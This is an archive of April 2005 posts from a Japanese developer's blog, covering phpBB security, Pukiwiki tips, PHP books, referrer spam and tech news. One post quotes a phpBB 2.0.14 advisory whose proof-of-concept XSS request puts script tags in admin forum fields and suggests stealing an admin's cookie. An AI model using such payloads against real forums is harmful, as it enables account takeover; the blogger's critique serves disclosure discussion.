月: 2005年4月

IE7 Beta

時期は「今年の夏」ということ以外は明示していませんが、近日中(?)についに出るようですね。まだ、中身を全然知らないのですがW3C DOMに完全対応とかだと良いのですが。
# ありえないか..

phpbbにまたセキュリティーホール…

セキュリティホールの指摘は良いことですが、パッチする前はルール違反ですね… 内容をよく確認していませんがクロスサイトスクリプティングの様です。Low Riskという認識にも問題があるかと…

いろいろ異論があるとは思いますがクロスサイトスクリプティングのリスクは中程度とするべきと考えています。アカウントの乗っ取りが可能なリスクですから。phpbbは何年も前になるのですがソースをざっと見て直感的に危ないと感じたこと、実際にバグが多すぎなこと、などからphpbbを使った事がないので分かりませんが管理者のアカウントが乗っ取られても登録されている個人情報(メールアドレスなど)が盗めないような仕組みにはなっていないと思いますがどうなんでしょう?

/*
——————————————————–
[N]eo [S]ecurity [T]eam [NST]ョ – Advisory #14 – 17/04/05
——————————————————–
Program: phpBB 2.0.14
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.14 & Lower versions
Risk: Low Risk!!
Impact: Multiple Vulnerabilities.

-==phpBB 2.0.14 Multiple Vulnerabilities==-
———————————————————

– Description
———————————————————
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

– Tested
———————————————————
localhost & many forums

– Explotation
———————————————————
-==Bad Filter of HTML Code==-
phpBB2/profile.php?mode=viewprofile&u=\[]\
phpBB2/viewtopic.php?p=3&highlight=\[]\
#########################################################
-==XSS==-
POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
forumname=<script>alert(‘NST’)</script>&forumdesc=<script>alert(‘NST’)</script>&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create new forum

Some people cannot find it interest someones yes but well i dont care because if you put some effort you know that
you can do a lot with this, like fooling the Admin of the Hosting to get his cookie & and then get access to whm…

– References
——————————————————–
http://neosecurityteam.net/Advisories/Advisory-14.txt

– Credits
————————————————-
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>

[N]eo [S]ecurity [T]eam [NST]ョ – http://neosecurityteam.net/

Got Questions? http://neosecurityteam.net/

Irc.gigachat.net #uruguay [NeoSecurity IRC]

– Greets
——————————————————–
Paisterist
Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns

And my Colombian people

@@@@”’@@@@’@@@@@@@@@’@@@@@@@@@@@
‘@@@@@”@@’@@@””””@@”@@@”@@
‘@@’@@@@@@”@@@@@@@@@””’@@@
‘@@”’@@@@””””’@@@””@@@
@@@@””@@’@@@@@@@@@@””@@@@@
*/

/* EOF */

検索フィールドを追加

なかなかWikiのコンテンツは拡充できませんが検索フィールドを復活させました。

Pukiwikiを使っている方で同じ様に検索フィールドを付けるのは簡単ですので好みの検索サイトを自分のWikiから検索できるようにするのも良いかも知れません。私はこのPukiwikiの機能を非常に気に入っているのですがあまり見掛けないので使い方を書いておきます。

Pukiwikiに他のサイトを検索するフィールドを追加する手順

  1. InterWikiNameのページに検索用のリンクを追加する
  2. 検索フィールドを付けたいページに#lookup()を使用して追加する

するだけで検索フィールドが追加できます。例えばgoogleを使ってPostgreSQLのマニュアルを検索するにはInterWikiNameに

[http://www.google.co.jp/search?ie=utf8&oe=utf8&lr=lang_ja&hl=ja&q=%22inurl%3Awww.postgresql.jp%2Fdocument%2Fpg802doc%2Fhtml%22 PostgreSQL] utf8

を追加します。InterWikiNameの書式は

[URL サーバ名] タイプ

の形式で記述します。PostgreSQLマニュアルの検索は一見複雑に見えるかも知れませんが特定のURLの中からページを検索するinurl:を使用しているだけです。タイプには文字エンコーディングの種類を指定します。これは日本語の場合、サイトが期待する文字エンコーディングで検索キーワードを送信しないと正しく検索できない為、明示的に指定する事になっています。

次に#lookupを使用してフィールドを表示します。

書式

#lookup(サーバ名、ボタン名)

使用例

#lookup(PostgreSQL,検索)

検索文字列をQuery Stringで指定するタイプの検索サイトであればほとんどのサイトがPukiwikiから検索できるようにできます。

ウィルスバスターの定義ファイル更新で、CPU使用率が100%になる不具合

ウィルスのパターンファイルや検索エンジンは自動更新になっている事が多いのでこういったリスクは付き物ですね。WindowsUpdateでも同じリスクはありますが、前にも書いた利便性とリスクをどう考えるかが問題ですね。自動更新のリスクの捉え方次第では「自動更新はダメ」としてしまいそうです。

しかし一般のユーザは、ほとんどが適切なタイミングで更新をしません。こういった問題があった事によって自動更新を止めるユーザが出なければよいのですが…

amazonのアソシエイトプログラムに参加してみる

今までこの手のプログラムを全く使った事がなかったのですが使ってみることしました。最初はこっそり本のイメージだけをアマゾンのサイトから拝借するだけにしようと思っていたのですが、どうせならアフリエイトも使ってみる良い機会と思い付けてみました。アマゾンの1500円の商品券が貰えるのは何年先になるのかな?

利便性とリスク

確か佐賀県で無毒化した河豚の肝を料理に出せるよう特区申請したらしいですが、あえなく不許可。理由は「100%安全か保障できないから」だそうです。河豚肝の毒は食べ物から来るらしく、5000匹の無毒化河豚からは毒は検出されなかったにも関わらず不許可だそうです。

アメリカ産の牛肉輸入禁止問題も2歳以下の牛(2才以下に見える牛)からは異常プリオンがほとんど検出できないので検査を省略しよう、と言う件も「100%安全と保障できないから全て検査しないとならない」との主張があるらしい。そもそもBSE問題が表面化してから予防対策はかなり厳しくなったのではないかと思います。2才以下に見える牛はかなり安全であるような気がします。

「100%安全と証明されていない」という理由で不許可なら遺伝子組み換え食品、ほぼ全ての医薬品は100%安全でないので不許可となるはずですが…

「コンピュータを100%安全に利用できるか?」と聞かれたので「人間は100%安全に生きれるか?」と聞き返しました。「生きている限り100%安全はありえないのと同じ、使用する限りコンピュータを100%安全に使う事は不可能です」と答えました。

何事も利便性とリスクのバランスをよく考える必要があると思います。

MacのDockをWindowsで

知っている方には当たり前かも知れませんが、WindowsでMac OSXのDockの様なインターフェースが使えます。

使って見たのは
ObjectDock
と言う製品で無料版と有料版があります。
見た目はOSXのDockと同じような感じになります。

http://www.stardock.com/products/objectdock/MediaGuide/index.6.jpg

有料版の場合、Dockにタブが付くイメージで使えるようです。

http://www.stardock.com/products/objectdock/PlusShots/Previe2.jpg

Dock風のインターフェースは普段使用しているxfce4のパネルと似ているので私のノートPCにも無料版を入れました。OSXのDockは結構気に入っているので満足しています。これでグリグリDockが動きます。あとはOSXのファンクションキーの機能が使えると便利ですね。
# OSXの場合、ファンクションキー(F9)を使って開いているウィ
# ンドウを縮小して表示、そして選択することができます。この
# 機能は非常に便利です。

PHPポケットリファレンスの改訂版にご意見ください

PHP5に対応したPHPポケットリファレンスの改訂版を執筆中です。アマゾンのレビューでは「サンプルスクリプトがサンプルになってない」と指摘も頂いています。

Wikiにも書いたとおり、サンプルスクリプトらしいコードを目指して書いていません。PHPは言語仕様と同じく関数仕様の記述も結構曖昧なこともあり、結局どういった入力の時にどのような動作や戻り値になるのか実行してみないと分からない事がよくあります。エラーが発生した場合、まっとうなシステムであればエラー処理をしなければならいですが、どの様な場合にエラーが発生するのか調べる、もしくは覚えていないと品質の高いシステムは作れません。この本ではシステム構築上、特に問題になりそうなエラー発生状態は分かるように書いたつもりです。

あまり時間も無いのでどこまでご意見を反映できるかわかりませんが、ここが不満、ここを改善した方が良い、などご意見を頂ければ助かります。もちろんメールで送って頂いても大丈夫です。よろしくお願いいたします。

はじめてのPHP言語プログラミング

まえにも書きましたが「はじめてのPHP言語プログラミング」という本を書きました。5月10日発行となっていますが、昨日からアマゾンでも買えるようになったようです。

Webサイトを作る為の入門書ではなく、PHPを習得する為の入門書として書いたつもりです。思い切って解説なしの部分も多々ありますが、プログラム経験者の方でこれからPHPを習得する方には適している本になったと思います。プログラミング初心者の方も、説明不足な部分がありますが、あまり問題無く読めると思います。もし読まれたら、メール、ブログ、Wiki、どこでも構いませんのでコメントを頂ければありがたいです。

PHPポケットリファレンス
は書きっぱなしでサポートページさえ作らずでしたが、今回からはサポートページも作って対応する予定です。

# データベースの説明にPostgreSQLが多く出てくるのは趣味です。
# 売れる本を狙うならMySQLなのかも知れませんが…

カードの暗証番号入力を拒否できるか?(続き)

暗証番号入力の拒否が面倒、と言う場合三井住友VISAカードなら、miniカードを利用するのも良いかも知れません。限度額が10万円なのでPCを買う場合などに利用できないですが申し込みました。

miniカードのカード番号は別の番号になるようです。写真からはICチップは付いていない様なので暗証番号入力を求められる事も無いはずです。
# 三井住友VISAの規約にはICチップ付きカードの場合、
# 暗証番号をサインの代わりに入力することもある、と
# 書いてあります。つまりICチップが無ければ、サイン
# でのみ利用可能と言うことですね。

しかしこの小さいカードを使うと店の人が使えるかどうか不安になったりするかも知れませんね ;)

リファラスパムが激減

以前にこのブログにもリファラスパムが大量にきている、と書きましたがリファラ元のリンク表示しないようにしてからリファラスパムは大幅に減りました。# リファラスパム以外にも検索スパムも来ていました。

スパマーも馬鹿ではないのでリファラ情報がページに表示されているかプローブしてからスパム行為をしているようです。プローブは来ていますが大量のリファラを送信するスパム行為は激減しました。非常に効果が大きいです。リファラスパム、検索スパムに困っている場合、これらのアクセス情報の公開を止めると大きな効果が期待できると思います。

呆れる程のスパム量に辟易してリファラ情報と検索情報の表示を削除する前後のトラフィックは次のようになりました。

日 訪問数 ページ 件数 バイト
2005年 4月 07 150 9160 10303 534.22 Mb

のような勢いでしたが、徐々に減少し現在は

日 訪問数 ページ 件数 バイト
2005年 4月 18 169 555 1655 21.58 Mb

と概ね以前のレベルのトラフィックに戻っています。blogやwikiにはリファラや検索キーワードを表示する機能がありますが、あまり人気があるとは言えないこのブログでさえこのような状態です。リファラや検索キーワードは公開しない方が良いと思います。

アドビがマクロメディアを買収

これで両方のスイートを揃えなくてすんで便利かな?!

マクロメディアがFlash PaperとかPDFの様な物を作ったり、開発者としてはやりづらい部分がありました。商用製品同士の競争が無くなるのは心配ですがオープンソースシステムとの競争は無くならないので利用者の利益はそれほど損なわれないと思います。

アドビよりマクロメディアのスイートの方が好み(多分なれているから)なので、現行のマクロメディア製品をベースに統合してくれるとありがたいですね。

しかしこのCNET Japanの記事へのトラックバック数は多いですね。それだけインパクトがあったと言うことですね。